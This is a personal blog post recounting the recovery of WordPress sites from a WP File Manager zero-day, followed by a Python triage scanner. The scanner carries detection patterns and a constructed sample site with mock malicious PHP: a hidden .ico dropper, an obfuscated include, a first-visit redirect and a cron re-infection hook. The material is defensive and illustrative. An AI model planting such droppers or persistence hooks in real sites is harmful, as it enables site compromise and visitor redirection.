Not something most people would even put on a portfolio, but regardless this was my crowning moment in becoming a WordPress master. When I first started at ILC, working with 18 WordPress installs, I had help with maintenance from a third-party vendor. Although I did not use them for major projects, they did a good job of keeping our WordPress installs up to date, which is huge in helping prevent website hacks and other malicious activity. To accomplish this, the team's main tool was a WordPress plugin called WP File Manager.

A zero-day is a vulnerability that attackers are already exploiting before the owners, the people who create and maintain the system, know it exists, so no patch is available yet; in this case it was one that could give malicious actors full control of the system. A zero-day in a web plugin is reached over the same HTTP requests the site already accepts, which is why network firewalls and OS hardening do little against it. One morning WP File Manager got hit with a zero-day. All of my defenses, firewalls, operating system hardening, control rules, were torn apart, and attackers got into most of our websites.

After discovery, and after struggling to fight it, I contacted the vendor. They were no help: without WP File Manager they had no other way to access the website files. So I set to work.

I will give the attackers this... it was a beautifully evil piece of malicious code. What it did was redirect our websites to a different place ONLY the first time a device loaded the site. After that the site worked normally. An absolute troubleshooting nightmare.

One of the first things I was able to figure out was why my firewall was not seeing anything. When I pulled up the code of the Wordfence Premium plugin, I noticed the scroll bar went to the right... very far to the right.

The attackers had added code to the firewall plugin to block detection. The code in question was all on one line and obfuscated.

After deleting it I found all of the holes, and boy were there a lot of holes! What the hack did was add a TON of pointers in a ton of different WordPress files, all pointing to a .ico file that held the payload. This code was also obfuscated, so I found a quick PHP deobfuscator online and was able to decode where the file was hidden. After deleting the file, the redirect went away!

Then I just had to remove all the bad code and plug any holes the attackers had added, especially the cron jobs that would re-add all of the bad code and the .ico file. That was fun to find the next morning.
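The cleanup above was done by hand, one file at a time. As an added example (not code from this post or from the vendor), the script below automates the triage for the same indicators: the single overlong, obfuscated line planted in a trusted plugin, eval() of a decoded string, include/require statements pointing at a .ico file, PHP code inside a file that should never contain any, a redirect that fires only when a first-visit cookie is absent (the usual way a "first load only" redirect is built), and WP-Cron hooks used to re-plant the dropper after it is deleted. It also decodes base64_decode('...') literals locally so the hidden path can be read without pasting the site's code into an online deobfuscator. The WordPress tree it scans is constructed inside the script; the file paths, hook names and redirect target are illustrative assumptions, not details from the real incident.

```python
"""Added example: triage scanner for the indicators described in this post.

The sample site it scans is constructed below; paths and contents are
illustrative, not artifacts from the actual incident.
"""
import base64
import os
import re
import tempfile

LONG_LINE = 1000  # a PHP line this long is almost always packed/obfuscated code

# (indicator name, regex) pairs checked against anything containing PHP
PHP_INDICATORS = [
    ("include of non-PHP file",
     re.compile(r"\b(?:include|require)(?:_once)?\b[^;]*?\.(?:ico|png|jpg|gif|txt)['\"]", re.I)),
    ("eval of decoded string",
     re.compile(r"\beval\s*\(\s*@?(?:base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(", re.I)),
    ("WP-Cron persistence",
     re.compile(r"\bwp_schedule_(?:single_)?event\s*\(", re.I)),
]
B64_LITERAL = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")


def cookie_gated_redirect(text):
    """First-visit-only redirect: read a cookie, set it, redirect only when it was absent."""
    return ("$_COOKIE" in text and "setcookie" in text
            and re.search(r"header\s*\(\s*['\"]Location:", text) is not None)


def scan_file(path):
    """Return the list of indicator names that fire on one file."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    hits = []
    is_php_file = path.lower().endswith(".php")
    has_php = "<?php" in text
    if is_php_file:
        if any(len(line) > LONG_LINE for line in text.splitlines()):
            hits.append("overlong line")
    elif has_php:
        hits.append("PHP code in non-PHP file")  # an icon or image must not contain PHP
    if is_php_file or has_php:
        hits += [name for name, rx in PHP_INDICATORS if rx.search(text)]
        if cookie_gated_redirect(text):
            hits.append("cookie-gated redirect")
    return hits


def scan_tree(root):
    """Walk a document root; map relative path -> indicators for every flagged file."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            hits = scan_file(full)
            if hits:
                findings[os.path.relpath(full, root).replace(os.sep, "/")] = hits
    return findings


def decode_base64_literals(text, max_layers=5):
    """Decode every base64_decode('...') literal, peeling nested layers, so hidden paths are readable."""
    out = []
    for blob in B64_LITERAL.findall(text):
        for _ in range(max_layers):
            try:
                blob = base64.b64decode(blob, validate=True).decode("utf-8")
            except (ValueError, UnicodeDecodeError):
                break
            out.append(blob)
            if not re.fullmatch(r"[A-Za-z0-9+/=]+", blob):
                break  # result is real code now, not another base64 layer
    return out


def build_sample_site(root):
    """Write a constructed, minimal WordPress tree carrying the artifacts described in the post."""
    dropper = "/wp-content/uploads/.cache/favicon.ico"  # hypothetical hiding place
    packed = base64.b64encode(("@include_once($_SERVER['DOCUMENT_ROOT'].'%s');" % dropper).encode()).decode()
    files = {
        # trusted firewall plugin with one packed line appended: the scroll bar "far to the right"
        "wp-content/plugins/wordfence/wordfence.php":
            "<?php\n// legitimate plugin code...\n" + "$i=0;" * 250 + "eval(base64_decode('%s'));\n" % packed,
        # core file with a plain pointer to the dropper
        "wp-includes/load.php": "<?php\n@include_once('%s');\n// ...rest of core file\n" % dropper,
        # the dropper: PHP hidden in an "icon", redirecting only on the first visit
        "wp-content/uploads/.cache/favicon.ico":
            "<?php\nif (!isset($_COOKIE['_seen'])) {\n    setcookie('_seen', '1', time() + 86400, '/');\n"
            "    header('Location: http://redirect.example/');\n    exit;\n}\n",
        # WP-Cron hook that re-plants the dropper if it is deleted
        "wp-content/plugins/hello.php":
            "<?php\nadd_action('reinfect', function () { file_put_contents('favicon.ico', '...'); });\n"
            "if (!wp_next_scheduled('reinfect')) { wp_schedule_event(time(), 'hourly', 'reinfect'); }\n",
        # clean theme file: must not be flagged
        "wp-content/themes/mytheme/functions.php":
            "<?php\nadd_action('wp_head', function () { echo '<!-- ok -->'; });\n",
    }
    for rel, content in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)


def run_demo():
    """Build the constructed site in a temp dir, scan it, and decode the packed literal."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_site(root)
        findings = scan_tree(root)
        with open(os.path.join(root, "wp-content/plugins/wordfence/wordfence.php"), encoding="utf-8") as fh:
            decoded = decode_base64_literals(fh.read())
    return findings, decoded


if __name__ == "__main__":
    findings, decoded = run_demo()
    for path, hits in sorted(findings.items()):
        print(f"{path}: {', '.join(hits)}")
    for snippet in decoded:
        print("decoded:", snippet)
```

Point `scan_tree()` at a real document root instead of the constructed one and treat every hit as a lead, not a verdict: minified vendor code in .php files and legitimate plugins that schedule WP-Cron events will show up too, so compare flagged core and plugin files against a fresh copy from wordpress.org before deleting anything, and remember that system crontabs, which this scanner does not read, are a second place the re-infection job can live.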

All in all it was a great learning experience, and it led to my handling all of the websites solo, with no more vendors for assistance.